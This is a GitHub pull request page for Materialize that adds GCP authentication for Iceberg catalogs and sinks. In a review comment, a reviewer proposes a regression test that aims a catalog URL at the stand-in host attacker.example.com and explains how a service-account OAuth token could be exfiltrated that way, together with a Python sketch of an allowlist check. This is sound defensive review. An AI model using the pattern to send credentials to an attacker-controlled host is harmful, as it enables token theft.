[SS-69] Iceberg catalog/sink can use a GCP connection #36695

Merged
ublubu merged 5 commits into main from kynan/iceberg-gcp on Jun 10, 2026
@ublubu ublubu commented May 22, 2026

Contributor

In this PR:

N.B. GCP BigLake doesn't perform Iceberg maintenance yet, so long-running Iceberg sinks will fail when the table metadata grows too large.
(ref: https://cloud.google.com/blog/products/data-analytics/improved-interoperability-for-your-apache-iceberg-lakehouse)

stacked on #36694

@ublubu ublubu force-pushed the kynan/iceberg-gcp branch from 30034e5 to c977c6e Compare May 22, 2026 19:38
@ublubu ublubu changed the title [SS-69] Iceberg catalog connections can use a GCP connection [SS-69] Iceberg catalog/sink can use a GCP connection May 22, 2026
@ublubu ublubu force-pushed the kynan/iceberg-gcp branch 3 times, most recently from 4200bae to 154e6a1 Compare May 26, 2026 20:10
Comment thread ci/nightly/pipeline.template.yml Outdated
Comment on lines +971 to +974
retry:
  automatic:
    - exit_status: 1
      limit: 1

Contributor

Why auto-retry? Do we expect it to be flaky?

Contributor Author

I don't expect it to be flaky. I'll turn off retries.

@ublubu ublubu force-pushed the kynan/iceberg-gcp branch 3 times, most recently from 07ae4e1 to 3f8af05 Compare May 28, 2026 20:58
@ublubu ublubu marked this pull request as ready for review June 2, 2026 14:12
@ublubu ublubu requested review from a team as code owners June 2, 2026 14:12

@patrickwwbutler patrickwwbutler left a comment

Contributor

Overall looks good besides the one question!

Comment thread src/storage-types/src/connections/gcp.rs

@def- def- left a comment

Contributor

How worried are we about someone being able to exfiltrate the GCP OAuth2 access token? I would argue we should be quite worried and only allow passing it to actual GCP URLs. Currently this works:

diff --git a/test/iceberg/gcp-connection-validation.td b/test/iceberg/gcp-connection-validation.td
new file mode 100644
index 0000000000..a3a4435bf2
--- /dev/null
+++ b/test/iceberg/gcp-connection-validation.td
@@ -0,0 +1,41 @@
+# Copyright Materialize, Inc. and contributors. All rights reserved.
+#
+# Use of this software is governed by the Business Source License
+# included in the LICENSE file at the root of this repository.
+#
+# As of the Change Date specified in that file, in accordance with
+# the Business Source License, use of this software will be governed
+# by the Apache License, Version 2.0.
+
+# Regression test for SS-69: an Iceberg REST catalog connection that
+# authenticates with a GCP connection must only send its reusable, broadly-
+# scoped bearer token to a Google-operated host. Without a plan-time host check,
+# a principal with only USAGE on the GCP connection can aim the catalog URL at a
+# host they control and exfiltrate the service-account token.
+
+# Disable default validation so the accepted case below doesn't connect; the
+# host check is enforced at plan time, independent of validation.
+$ postgres-execute connection=postgres://mz_system:materialize@${testdrive.materialize-internal-sql-addr}
+ALTER SYSTEM SET enable_default_connection_validation = false
+
+> CREATE SECRET gcpsa AS 'dummy'
+
+> CREATE CONNECTION gcpconn TO GCP (SERVICE ACCOUNT KEY = SECRET gcpsa)
+
+# Exploit: a non-Google catalog host must be rejected before any token is sent.
+! CREATE CONNECTION evil TO ICEBERG CATALOG (
+    CATALOG TYPE = 'rest',
+    URL = 'https://attacker.example.com/iceberg/v1/restcatalog',
+    GCP CONNECTION = gcpconn,
+    WAREHOUSE = 'gs://anything'
+  )
+contains:must point URL at a *.googleapis.com host
+
+# Positive control: a real BigLake host is accepted, so the allowlist doesn't
+# break the feature.
+> CREATE CONNECTION biglake TO ICEBERG CATALOG (
+    CATALOG TYPE = 'rest',
+    URL = 'https://biglake.googleapis.com/iceberg/v1/restcatalog',
+    GCP CONNECTION = gcpconn,
+    WAREHOUSE = 'gs://anything'
+  )
diff --git a/test/iceberg/mzcompose.py b/test/iceberg/mzcompose.py
index 78aa241741..990848d1fb 100644
--- a/test/iceberg/mzcompose.py
+++ b/test/iceberg/mzcompose.py
@@ -80,6 +80,22 @@ def workflow_smoke(c: Composition) -> None:
     )


+def workflow_gcp_connection_validation(c: Composition) -> None:
+    """Regression test for SS-69: an Iceberg REST catalog connection that
+    authenticates with a GCP connection must only target Google-operated catalog
+    hosts. A GCP access token is a reusable, broadly-scoped bearer credential
+    with no audience binding, so before this validation a principal with only
+    USAGE on a GCP connection could point the catalog URL at an attacker host and
+    exfiltrate the connection's service-account token. This exercises connection
+    planning only and needs no Iceberg backend."""
+    c.down(destroy_volumes=True)
+    c.up("materialized")
+
+    c.run_testdrive_files(
+        "gcp-connection-validation.td",
+    )
+
+
 def workflow_mode_append(c: Composition) -> None:
     key = _setup(c)

and allows someone with only USAGE on the GCP connection object to send the OAuth token to attacker.example.com.
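
For illustration, here is a minimal sketch of the kind of plan-time host check this comment asks for, written in Python for brevity. It is not the code in this PR: the function name `is_google_api_host` and the HTTPS requirement are assumptions, and the `*.googleapis.com` rule is taken only from the error message the test above expects.

```python
from urllib.parse import urlsplit

# Assumed allowlist suffix, taken from the expected error message in the test
# ("must point URL at a *.googleapis.com host").
ALLOWED_SUFFIX = ".googleapis.com"


def is_google_api_host(url: str) -> bool:
    """Return True only for https URLs whose host is a subdomain of googleapis.com.

    Hypothetical helper: a sketch of the check, not Materialize's implementation.
    """
    try:
        parts = urlsplit(url)
        host = parts.hostname  # lowercased, with userinfo and port stripped
    except ValueError:
        # Malformed URLs (e.g. unbalanced IPv6 brackets) are rejected outright.
        return False
    if parts.scheme != "https" or host is None:
        return False
    host = host.rstrip(".")  # tolerate a fully-qualified trailing dot
    # Require a non-empty label before the suffix, so ".googleapis.com" alone
    # and look-alikes such as "evilgoogleapis.com" do not match.
    return host.endswith(ALLOWED_SUFFIX) and len(host) > len(ALLOWED_SUFFIX)


if __name__ == "__main__":
    for candidate in (
        "https://biglake.googleapis.com/iceberg/v1/restcatalog",
        "https://attacker.example.com/iceberg/v1/restcatalog",
        "https://biglake.googleapis.com@attacker.example.com/",
    ):
        print(candidate, is_google_api_host(candidate))
```

The check compares the parsed hostname rather than the raw string, so a URL that only mentions `googleapis.com` in its userinfo or as a prefix of an attacker-controlled domain is rejected along with the plain `attacker.example.com` case.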

@ublubu ublubu force-pushed the kynan/iceberg-gcp branch from 3f8af05 to f7e27e1 Compare June 4, 2026 15:32
@ublubu ublubu force-pushed the kynan/iceberg-gcp-connection branch 2 times, most recently from 0a4293d to fb3cc5b Compare June 4, 2026 16:33
@ublubu ublubu force-pushed the kynan/iceberg-gcp branch from f7e27e1 to acc2db7 Compare June 4, 2026 16:33
@ublubu ublubu force-pushed the kynan/iceberg-gcp-connection branch from fb3cc5b to c92b606 Compare June 4, 2026 18:28
@ublubu ublubu force-pushed the kynan/iceberg-gcp branch from acc2db7 to 26b818e Compare June 4, 2026 18:28
@ublubu ublubu force-pushed the kynan/iceberg-gcp-connection branch from c92b606 to 8eee70d Compare June 4, 2026 18:35
@ublubu ublubu force-pushed the kynan/iceberg-gcp branch 2 times, most recently from a3408b2 to 7c400e7 Compare June 4, 2026 21:14

@martykulma martykulma left a comment

Contributor

nice!

Comment thread src/storage-types/src/connections.rs
@ublubu ublubu force-pushed the kynan/iceberg-gcp branch from 3bcf327 to 8ec6f5b Compare June 8, 2026 16:30
@ublubu ublubu force-pushed the kynan/iceberg-gcp-connection branch from 240661f to 4bf1a89 Compare June 8, 2026 16:30
@ublubu ublubu force-pushed the kynan/iceberg-gcp branch 2 times, most recently from e89154b to fdbb619 Compare June 8, 2026 18:48
@ublubu ublubu force-pushed the kynan/iceberg-gcp-connection branch 2 times, most recently from 3e15e10 to a45821e Compare June 8, 2026 19:28
@ublubu ublubu force-pushed the kynan/iceberg-gcp branch from fdbb619 to 96d20a7 Compare June 8, 2026 19:28
@ublubu ublubu force-pushed the kynan/iceberg-gcp-connection branch 2 times, most recently from f9afd3e to bdcdec3 Compare June 10, 2026 16:03
Base automatically changed from kynan/iceberg-gcp-connection to main June 10, 2026 16:36
@ublubu ublubu force-pushed the kynan/iceberg-gcp branch 2 times, most recently from ac9ed8a to 33835ac Compare June 10, 2026 17:01
ublubu added 3 commits June 10, 2026 14:17
resolve conflicts in xl (Iceberg REST + GCP): union import list + biglake parser test + GCP keyword
@ublubu ublubu force-pushed the kynan/iceberg-gcp branch from 33835ac to 7428408 Compare June 10, 2026 18:47
@ublubu ublubu force-pushed the kynan/iceberg-gcp branch from 7428408 to 19a77b5 Compare June 10, 2026 19:26
@ublubu ublubu enabled auto-merge (squash) June 10, 2026 19:44
@ublubu ublubu merged commit 5173c50 into main Jun 10, 2026
129 checks passed
@ublubu ublubu deleted the kynan/iceberg-gcp branch June 10, 2026 19:48
4 participants